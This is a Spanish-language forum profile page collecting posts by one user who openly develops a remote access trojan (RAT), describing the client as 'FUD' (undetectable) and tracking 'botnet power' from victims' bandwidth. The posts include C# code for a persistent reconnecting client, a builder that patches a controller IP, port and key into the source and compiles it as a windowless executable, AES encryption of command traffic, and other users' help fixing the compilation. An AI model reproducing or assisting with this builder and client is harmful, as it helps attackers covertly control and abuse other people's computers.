Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - nevachana

#31
Bueno,gracias por las respuestas.
La verdad es que ya la terminé,la conexión,y no me ha quedado nada mal ( 300 clients y usa 0% de cpu,aunque supongo que serían por que son locales).
https://gyazo.com/4023f795a1e6180fa0f83066f912fc1c
El trackbar varía según el número de clientes conectados,y el average botnet power es la suma de los Mbps disponibles de cada cliente  :laugh:.
#32
Creo que podrías usar "\n"
cuando el timer esté activado:
text1.Text += "\n";
#33
Hola  :D,estoy intentando cifrar la conexion entre mi client y servidor,pero al enviar o recibir paquetes me da este error:
El relleno entre caracteres no es válido y no se puede quitar.

Código (csharp) [Seleccionar]
doAction(AES_Decrypt(buffer, Encoding.Default.GetBytes(this.keyG)).ToString());


public byte[] AES_Decrypt(byte[] bytesToBeDecrypted, byte[] passwordBytes)
        {
            byte[] decryptedBytes = null;
            byte[] saltBytes = new byte[] { 1, 2, 3, 4, 5, 6, 7, 8 };
            using (MemoryStream ms = new MemoryStream())
            {
                using (RijndaelManaged AES = new RijndaelManaged())
                {
                    AES.KeySize = 256;
                    AES.BlockSize = 128;
                    var key = new Rfc2898DeriveBytes(passwordBytes, saltBytes, 1000);
                    AES.Key = key.GetBytes(AES.KeySize / 8);
                    AES.IV = key.GetBytes(AES.BlockSize / 8);
                    AES.Mode = CipherMode.CBC;
                    using (var cs = new CryptoStream(ms, AES.CreateDecryptor(), CryptoStreamMode.Write))
                    {
                        cs.Write(bytesToBeDecrypted, 0, bytesToBeDecrypted.Length);
                        cs.Close(); // Aquí me salta la exepcion
                    }
                    decryptedBytes = ms.ToArray();
                }
            }
            return decryptedBytes;
        }


La clave que estoy usando es: YmyWRtxxc5¿Jun/y%2WH%jyM1f , puede que sea por que tiene caracteres raros?
#34
Foro Libre / Re: Vaya ddos más raro no?
20 Agosto 2015, 21:12 PM
Cita de: MinusFour en 20 Agosto 2015, 20:56 PM
O el script que produce el video esta haciendo algo mal... o los timestamps estan mal, etc..
Con otros es muy diferente
https://gyazo.com/f5efa7ae140f31bc5d26359b23741df3
#35
Foro Libre / Vaya ddos más raro no?
20 Agosto 2015, 20:53 PM
Normalmente suelen enviar los paquetes seguidos,sin embargo en este parece que espera ciertos ms entre cada paquete no?
https://gyazo.com/a07be9d1c7992ba6ed1a0b26d0525b34
RIP cloudflare https://gyazo.com/e4cf89d333814b35046cdd87dd6d557b
#36
Cita de: engel lex en 20 Agosto 2015, 16:18 PM
Creo que estás confundiendo conceptos... el servidor es al que te conectas, es decir es la parte en la pc de las victimas... el cliente es quien se conecta a los servidores para cometer sus funciones, es decir el panel de control

sobre si cifrar en AES no veo ni si quiera por qué dudarlo...
Solamente había trabajado con el cifrado cesar antes,no sé mucho.
Lo que estoy preguntando es sobre cómo optimizar el server.
Había pensado que cada vez que se conecte un client crear un thread para leer los datos que envía,si está conectado,si realiza bien las acciones etc,pero si se conectan por ejemplo 300 clientes a la vez,serían 300 threads funcionando,lo cual creo es una bestialidad.
He escuchado de servers que sólo usan un thread.
#37
Hola  :D.
Estoy creando un Rat,y ya he hecho el client ( Fud  ;-) , aunque sin muchas funciones ).
Y ahora estoy haciendo el server,pero necesitaría ideas de como hacerlo estable.
Había pensado lo siguiente.

Al iniciarse el programa se inicia un thread a la espera de clients.
Si un client se conecta,lo almacenamos en un diccionario y creamos un thread para escuchar los packets que envía.
Si el client se desconecta,lo borramos del diccionario y rompemos el thread que lo escuchaba.

Pero no me convence crear un thread que escuche conexiones para luego crear un thread por cliente..
Alguna idea?  :)

PD: había pensado cifrar los packets con AES,qué tal?
#38
Cita de: Eleкtro en 19 Agosto 2015, 14:54 PM
No, solo es necesario tener .Net Framework 4.0 instalado en el sistema operativo (puesto que estás compilando para esa versión).

El motivo por el cual el compilador te devuelve errores es por que aquí has escrito varios ensamblados que no existen:
Microsoft.Threading.dll y Microsoft.Text.dll en realidad se escriben System.Threading y System.Text tal y como ya lo tienes escrito en las importaciones de la class client, pero no son librerías, son nombres de espacios contenidos en la librería System.dll. Lo mismo ocurre con System.Net.Sockets.

De todas esas librerías que añades, en realidad solo necesitas añadir las librerías System.dll y System.Net.dll, arregla eso, vuelve a intentar compilar y muestra el nuevo error en caso de que tuvieras alguno.

Aparte de eso, estás intentando compilar una app de consola pero has configurado los parámetros del compiler para que genere un exe con interfáz gráfica. elimina esto:
Además, vuelvo a recordarte que debes indicarle al compiler el nombre completo del miembro principal del código fuente en donde se encuentra el entry point (es decir, Rat.Client) cómo en el ejemplo que te mostré. Te muestro otro ejemplo:

Código (vbnet) [Seleccionar]
Dim cResult As CompilerResults
Dim pOptions As New Dictionary(Of String, String)() From {{"CompilerVersion", "v4.0"}}
Using cProvider As CodeDomProvider = New CSharpCodeProvider(pOptions)

    Dim cParams As New CompilerParameters()

    If cProvider.Supports(GeneratorSupport.EntryPointMethod) Then
        cParams.MainClass = "Rat.Client"
    End If

    cResult = cProvider.CompileAssemblyFromSource(cParams, source)

End Using

Dim warnings As IEnumerable(Of CompilerError) =
    From ce As CompilerError In cResult.Errors.Cast(Of CompilerError)()
    Where ce.IsWarning

Dim errors As IEnumerable(Of CompilerError) =
    From ce As CompilerError In cResult.Errors.Cast(Of CompilerError)()
    Where Not ce.IsWarning


Conversión online a C#:
Código (csharp) [Seleccionar]
CompilerResults cResult = default(CompilerResults);
Dictionary<string, string> pOptions = new Dictionary<string, string> { {"CompilerVersion", "v4.0"} };
using (CodeDomProvider cProvider = new CSharpCodeProvider(pOptions)) {

CompilerParameters cParams = new CompilerParameters();

if (cProvider.Supports(GeneratorSupport.EntryPointMethod)) {
cParams.MainClass = "Rat.Client";
}

cResult = cProvider.CompileAssemblyFromSource(cParams, source);
}

IEnumerable<CompilerError> warnings = from ce in cResult.Errors.Cast<CompilerError>() where ce.IsWarning;
IEnumerable<CompilerError> errors = from ce in cResult.Errors.Cast<CompilerError>() where !ce.IsWarning;

//=======================================================
//Service provided by Telerik (www.telerik.com)
//=======================================================


Saludos
Muchísimas gracias! ya lo solucioné ^^!
#39
Cita de: Eleкtro en 19 Agosto 2015, 06:47 AM



No somos adivinos, por favor no me hagas repetirte esto en el futuro.

Cómo mínimo da los detalles necesarios y esenciales cuando tengas "X" error, muestra el o los mensajes de error, que no tengamos que estar preguntándote por algo tan básico para poder entender que error tienes y ofrecerte ayuda.




El código que has mostrado es literálmente nada, ya que un código fuente necesita seguir una estructura para poder ser compilado.

Esto sería un ejemplo de un código compilable, una aplicación de consola, donde cómo ves hay un punto de entrada (método Main) dentro de una clase que a su vez está dentro de un espacio de nombres:
Código (csharp) [Seleccionar]
using System;

namespace MainNamespace
{
   class MainClass
   {
       static void Main(string[] args)
       {
          // Tú código aquí.
       }
   }
}


Aparte de eso, recuerda que estás dependiendo del namespace System.Windows.Forms (SaveFileDialog), por lo que aparte de añadir la referencia a dicho ensamblado usando los parámetros del compilador, debes añadir la correspondiente directiva using en tu código fuente, y lo mismo con cualqueir otro namespace que requieras.

Por último, en el proveedor debes especificar el nombre completo del miembro principal, que en el código de ejemplo que he mostrado sería el siguiente:
Código (csharp) [Seleccionar]
...
CodedomProvider provider = new CSharpCodeProvider();
provider.MainClass = "MainNamespace.MainClass";
...


EDITO:
Y esta instrucción, elimínala, aparte de que no hay necesidad de compilar bajo NetFx 2.0, si utilizas ensamblados que requieran una versión superior (ej: System.Linq.dll) no podrás compilar. Deja que la lógica del proveedor elija la versión adecuada por si mismo:
Aquí puedes ver un ejemplo más detallado que desarrollé:
Librería de Snippets para VB.Net !!

Saludos.
Perdón,aquí va mi segundo intento.
Quiero dar la opción al usuario que use de mi programa de poder crear su propio server,y para ello edita el client a la respectiva ip y puerto.

Código del client:

Código (csharp) [Seleccionar]
using System;
using System.Net;
using System.Net.Sockets;
using System.Text;
using System.Threading;

namespace Rat
{
    class Client
    {
        private string ipG = @"<replace_ip>";
        private int portG = 2341;
        private string keyG = @"<replace_key";
        private string nameG = @"<replace_name>";
        static void Main(string[] args)
        {
            Client cl = new Client();
            cl.tryConexion(cl.ipG, cl.portG,false);
        }
        public string tryConexion(string ip, int port,bool isTest)
        {
            try
            {
                TcpClient client = new TcpClient(ip, port);
                if(isTest == false)
                handlePackets(client);
                return "Conexion works";

            }
            catch
            {
                if(isTest == false)
                tryConexion(ip, port,false);
                return "deny";
            }
        }
        public void handlePackets(TcpClient client)
        {
            try
            {
                NetworkStream stream = client.GetStream();
                Byte[] buffer = new Byte[client.Available];
                while (client.Connected)
                {
                    buffer = new Byte[client.Available];
                    stream.Read(buffer, 0, buffer.Length);
                    doAction(Encoding.ASCII.GetString(buffer));
                    stream.Flush();
                    Thread.Sleep(1);
                }
            }
            catch
            {
                tryConexion(ipG, portG,false);
            }
        }
        public void doAction(string packet)
        {
            string[] packetParam = packet.Split('<');
            switch (packet)
            {
            }
        }

    }
}
,El código del client lo guardo en un .txt en la carpeta resources y luego lo convierto en string.

Código (csharp) [Seleccionar]
string source = Properties.Resources.client;

después lo edito siguiendo los datos que haya dado el usuario

Código (csharp) [Seleccionar]
                source = source.Replace("<replace_ip>", ipTxt.Text);
                source = source.Replace("2341", portTxt.Text);
                source = source.Replace("<replace_key", keyTxt.Text);
                source = source.Replace("<replace_name>", nameTxt.Text);


y finalmente lo intento compilar:

Código (csharp) [Seleccionar]
bool success = Compiler.CompileFromSource(source, FSave.FileName);

Y aquí lo que lo compila

Código (csharp) [Seleccionar]
   public static bool CompileFromSource(string source, string Output, string Icon = null, string[] Resources = null)
        {
            CompilerParameters CParams = new CompilerParameters();
            CParams.GenerateExecutable = true;
            CParams.OutputAssembly = Output;
            string options = "/optimize+ /platform:x86 /target:winexe /unsafe";
            if (Icon != null)
                options += " /win32icon:\"" + Icon + "\"";
            CParams.CompilerOptions = options;
           CParams.TreatWarningsAsErrors = false;
            CParams.ReferencedAssemblies.Add("System.dll");
            CParams.ReferencedAssemblies.Add("System.Windows.Forms.dll");
            CParams.ReferencedAssemblies.Add("System.Drawing.dll");
            CParams.ReferencedAssemblies.Add("System.Data.dll");
            CParams.ReferencedAssemblies.Add("Microsoft.VisualBasic.dll");
            CParams.ReferencedAssemblies.Add("System.Net.dll");
            CParams.ReferencedAssemblies.Add("System.Net.Sockets.dll");
            CParams.ReferencedAssemblies.Add("Microsoft.Text.dll");
            CParams.ReferencedAssemblies.Add("Microsoft.Threading.dll");
            if (Resources != null && Resources.Length > 0)
            {
                foreach (string res in Resources)
                {
                    CParams.EmbeddedResources.Add(res);
                }
            }
            Dictionary<string, string> ProviderOptions = new Dictionary<string, string>();
            ProviderOptions.Add("CompilerVersion", "v4.0");
            CompilerResults Results = new CSharpCodeProvider(ProviderOptions).CompileAssemblyFromSource(CParams, source);
            if (Results.Errors.Count > 0)
            {
                MessageBox.Show(string.Format("The compiler has encountered {0} errors",
                    Results.Errors.Count), "Errors while compiling", MessageBoxButtons.OK,
                    MessageBoxIcon.Error);
                foreach (CompilerError Err in Results.Errors)
                {
                    MessageBox.Show(string.Format("{0}\nLine: {1} - Column: {2}\nFile: {3}", Err.ErrorText,
                        Err.Line, Err.Column, Err.FileName), "Error",
                        MessageBoxButtons.OK, MessageBoxIcon.Error);
                }
                return false;

            }
            else
            {
                return true;
            }

        }


Y al compilar,me da estos errores:
https://gyazo.com/4d0dfac4a26487fc096390f835ec6930

Debo de poner los dll junto al programa?